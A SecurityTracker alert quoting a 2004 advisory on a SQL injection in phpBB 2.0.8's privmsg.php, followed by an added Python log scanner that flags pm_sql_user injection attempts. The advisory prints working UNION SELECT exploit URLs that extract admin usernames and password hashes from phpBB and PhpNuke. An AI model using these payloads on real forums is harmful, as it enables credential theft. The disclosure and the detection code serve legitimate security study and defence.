phpBB Input Validation Flaw in 'privmsg.php' Lets Remote Users Inject SQL Commands
SecurityTracker Alert ID: 1009563
CVE Reference: GENERIC-MAP-NOMATCH
Date: Mar 26 2004
Impact: Disclosure of user information, Execution of arbitrary code via network
Exploit Included: Yes
Version(s): 2.0.8
Description: An input validation vulnerability was reported in phpBB in the 'privmsg.php' script. A remote user can inject SQL commands.
Janek Vind (waraxe) reported that 'privmsg.php' does not properly validate the pm_sql_user variable when the 'folder' variable is set to 'savebox'. A remote user can supply a specially crafted value to execute SQL commands on the database.
A demonstration exploit URL to retrieve the administrator's hashed password is provided:
http://localhost/phpbb206c/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.priv
msgs_type=-99%20UNION%20SELECT%20username,null,use
ll,null,null,null,null,null,null,null,null,null FROM phpbb_users WHERE user_level=1
LIMIT 1/*
Impact: A remote user can inject SQL commands to be executed on the underlying database.
Solution: No solution was available at the time of this entry.
Vendor URL: www.phpbb.com/
Cause: Input validation error
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
Reported By: Janek Vind <come2waraxe@yahoo.com>
Message History: None.
Source Message Contents
Date: 26 Mar 2004 17:27:40 -0000
From: Janek Vind <come2waraxe@yahoo.com>
Subject: [waraxe-2004-SA#013] - Critical sql injection bug in PhpBB 2.0.8
{================================================================================}
{ [waraxe-2004-SA#013] }
{================================================================================}
{ }
{ [ Critical sql injection bug in PhpBB 2.0.8 and in older versions ] }
{ }
{================================================================================}
Author: Janek Vind "waraxe"
Date: 26. March 2004
Location: Estonia, Tartu
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
PhpBB is widely used and very popular forum software, written in PHP.
Homepage: http://www.phpbb.com/
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
PhpBB 2.0.x is written very carefully and securely. But even there, bugs can exist which
will give a potential malicious attacker sensitive information from the database: the admin's
username and the MD5 hash of the admin's password.
So, let's look at the original code from privmsg.php, line 189:
*************************************************************************************
// SQL to pull appropriate message, prevents nosey people
// reading other peoples messages ... hopefully!
//
switch( $folder )
{
    case 'inbox':
        $l_box_name = $lang['Inbox'];
        $pm_sql_user = "AND pm.privmsgs_to_userid = " . $userdata['user_id'] . "
            AND ( pm.privmsgs_type = " . PRIVMSGS_READ_MAIL . "
                OR pm.privmsgs_type = " . PRIVMSGS_NEW_MAIL . "
                OR pm.privmsgs_type = " . PRIVMSGS_UNREAD_MAIL . " )";
        break;
    case 'outbox':
        $l_box_name = $lang['Outbox'];
        $pm_sql_user = "AND pm.privmsgs_from_userid = " . $userdata['user_id'] . "
            AND ( pm.privmsgs_type = " . PRIVMSGS_NEW_MAIL . "
                OR pm.privmsgs_type = " . PRIVMSGS_UNREAD_MAIL . " ) ";
        break;
    case 'sentbox':
        $l_box_name = $lang['Sentbox'];
        $pm_sql_user = "AND pm.privmsgs_from_userid = " . $userdata['user_id'] . "
            AND pm.privmsgs_type = " . PRIVMSGS_SENT_MAIL;
        break;
    case 'savebox':
        $l_box_name = $lang['Savebox'];
        $pm_sql_user .= "AND ( ( pm.privmsgs_to_userid = " . $userdata['user_id'] . "
                AND pm.privmsgs_type = " . PRIVMSGS_SAVED_IN_MAIL . " )
            OR ( pm.privmsgs_from_userid = " . $userdata['user_id'] . "
                AND pm.privmsgs_type = " . PRIVMSGS_SAVED_OUT_MAIL . " )
        )";
        break;
    default:
        message_die(GENERAL_ERROR, $lang['No_such_folder']);
        break;
}
//
// Major query obtains the message ...
//
$sql = "SELECT u.username AS username_1, u.user_id AS user_id_1, u2.username AS username_2, u2.user_id AS user_id_2, u.user_sig_bbcode_uid,
        u.user_posts, u.user_from, u.user_website, u.user_email, u.user_icq, u.user_aim, u.user_yim, u.user_regdate, u.user_msnm, u.user_viewemail,
        u.user_rank, u.user_sig, u.user_avatar, pm.*, pmt.privmsgs_bbcode_uid, pmt.privmsgs_text
    FROM " . PRIVMSGS_TABLE . " pm, " . PRIVMSGS_TEXT_TABLE . " pmt, " . USERS_TABLE . " u, " . USERS_TABLE . " u2
    WHERE pm.privmsgs_id = $privmsgs_id
        AND pmt.privmsgs_text_id = pm.privmsgs_id
        $pm_sql_user
        AND u.user_id = pm.privmsgs_from_userid
        AND u2.user_id = pm.privmsgs_to_userid";
*****************************************************************************
As we can see, for some reason there is "$pm_sql_user .=" in the case of 'savebox'. The funny thing is that
this little bug can open a critical security hole in the forum. First, let's try this:
http://localhost/phpbb206c/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=foobar
and we get this error message:
General Error
Could not query private message post information
DEBUG MODE
SQL Error : 1064 You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'foobarAND ( ( pm.privmsgs_to_userid = 2 AND pm.privmsgs_t
SELECT u.username AS username_1, u.user_id AS user_id_1, u2.username AS username_2, u2.user_id AS user_id_2, u.user_sig_bbcode_uid, u.user_posts, u.user_from, u.user_website, u.user_email, u.user_icq, u.user_aim, u.user_yim, u.user_regdate, u.user_msnm, u.user_viewemail, u.user_rank, u.user_sig, u.user_avatar, pm.*, pmt.privmsgs_bbcode_uid, pmt.privmsgs_text FROM phpbb_privmsgs pm, phpbb_privmsgs_text pmt, phpbb_users u, phpbb_users u2 WHERE pm.privmsgs_id = 99 AND pmt.privmsgs_text_id = pm.privmsgs_id foobarAND ( ( pm.privmsgs_to_userid = 2 AND pm.privmsgs_type = 3 ) OR ( pm.privmsgs_from_userid = 2 AND pm.privmsgs_type = 4 ) ) AND u.user_id = pm.privmsgs_from_userid AND u2.user_id = pm.privmsgs_to_userid
Line : 238
File : D:\apache_wwwroot\phpbb206c\privmsg.php
Next, if we request this:
http://localhost/phpbb206c/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/*
then we don't get any error messages. Now it's time to do something "useful":
********************[real-life sploit]********************
http://localhost/phpbb206c/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20username,null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM phpbb_users WHERE user_level=1 LIMIT 1/*
********************[/real-life sploit]*******************
and we will see the admin's username and the MD5 hash of the admin's password in plaintext ;)
And to all PhpNuke 6.x and 7.x users, here is something for you:
http://localhost/nuke69j1/modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*
Post Scriptum:
I really enjoy reading the PhpBB 2.x code, because it is written with good style and is
very secure. To all PHP programmers: I recommend reading the file "docs\codingstandards.htm" from the
phpBB package; it will help you learn good programming style!
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to torufoorum members and to all bugtraq readers in Estonia! Tervitused!
Special greets to Stefano from UT Bee Clan!
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@yahoo.com
Janek Vind "waraxe"
---------------------------------- [ EOF ] ------------------------------------
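The register_globals pre-seeding the advisory describes leaves a simple trace in web server logs: a request that carries a query parameter named after one of the script's own internal variables, which no legitimate client ever sends. The following Python is an added example, not part of the advisory or the SecurityTracker entry; it scans constructed Apache combined-format log lines for requests to privmsg.php (or the PhpNuke Private_Messages module) that supply pm_sql_user and grades each hit by whether the decoded value contains a UNION SELECT or comment sequence. The log lines, client addresses and paths are constructed; INTERNAL_VARS is an assumed, extendable list seeded with the one variable named on this page.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Apache combined format), not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [26/Mar/2004:17:27:40 +0000] "GET /phpbb/privmsg.php?folder=savebox&mode=read&p=99 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [26/Mar/2004:17:28:01 +0000] "GET /phpbb/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=foobar HTTP/1.1" 200 1201 "-" "curl/7.10"
10.0.0.9 - - [26/Mar/2004:17:28:15 +0000] "GET /phpbb/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20username,null,user_password%20FROM%20phpbb_users/* HTTP/1.1" 200 6400 "-" "curl/7.10"
10.0.0.7 - - [26/Mar/2004:17:29:00 +0000] "GET /nuke/modules.php?name=Private_Messages&file=index&folder=savebox&pm_sql_user=x HTTP/1.1" 200 900 "-" "Mozilla/5.0"
10.0.0.7 - - [26/Mar/2004:17:29:30 +0000] "GET /phpbb/viewtopic.php?t=12 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

# Client IP, timestamp and request target of a combined-format line.
REQ_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"')

# Internal PHP variables the script builds itself; no legitimate client sends
# them, so one in the query string is a register_globals pre-seeding attempt.
INTERNAL_VARS = {"pm_sql_user"}  # assumed list, seeded from the advisory

# Crude SQL-injection signature, checked against the URL-decoded value.
SQLI_RE = re.compile(r"\bunion\s+select\b|/\*|--", re.I)

def is_private_message_script(path, params):
    # phpBB's privmsg.php, or the same code reached via PhpNuke's Private_Messages module
    if path.endswith("/privmsg.php"):
        return True
    return path.endswith("/modules.php") and params.get("name") == ["Private_Messages"]

def analyse_line(line):
    # Returns a finding dict for a suspicious request, None for a benign one.
    m = REQ_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    # parse_qs decodes %xx and splits each pair on its first '=' only, so the payload's own '=' survives
    params = parse_qs(url.query, keep_blank_values=True)
    if not is_private_message_script(url.path, params):
        return None
    injected = sorted(INTERNAL_VARS & set(params))
    if not injected:
        return None
    value = params[injected[0]][0]
    # "medium": internal variable supplied but no SQL payload (the advisory's "foobar" probe)
    severity = "high" if SQLI_RE.search(value) else "medium"
    return {"ip": m.group("ip"), "ts": m.group("ts"), "param": injected[0],
            "value": value, "severity": severity}

def scan(log_text):
    # Run analyse_line over every line and keep only the findings.
    return [f for f in map(analyse_line, log_text.splitlines()) if f]
```

The same approach works for any register_globals-era script: add each internal variable name that the code assigns with `.=` or reads before initialising to INTERNAL_VARS, and the benign first and last sample lines keep producing no finding.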